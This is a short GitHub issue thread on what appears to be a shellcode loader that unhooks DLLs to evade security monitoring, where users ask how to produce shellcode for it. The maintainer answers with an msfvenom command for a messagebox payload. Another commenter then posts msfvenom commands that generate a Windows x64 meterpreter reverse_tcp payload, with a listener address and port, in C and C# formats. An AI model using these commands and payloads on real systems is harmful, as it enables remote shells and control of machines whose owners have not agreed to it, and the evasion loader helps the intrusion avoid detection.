### ISSUE TITLE
how to generate my payload

### ISSUE THREAD

**Issue by ZomanolasCH** [Processus-Thief/UnhookingDLL#1]
hello how to generate my own popup or open another file ?
unsigned char NqQlPkEKGs[] = ""

**Comment by ProcessusT** [comment]
You can generate it with metasploit :
msfvenom -p windows/x64/messagebox TEXT=hello TITLE=hello -f c

**Comment by sec13b** [comment]
can  be generate it with metasploit  any payload ?
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.131.128 LPORT=4444  -f csharp 
the output format you used (-f c ) which language is it  C‎  ‎C++‎ ‎C#‎

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.131.128 LPORT=4444 -f c
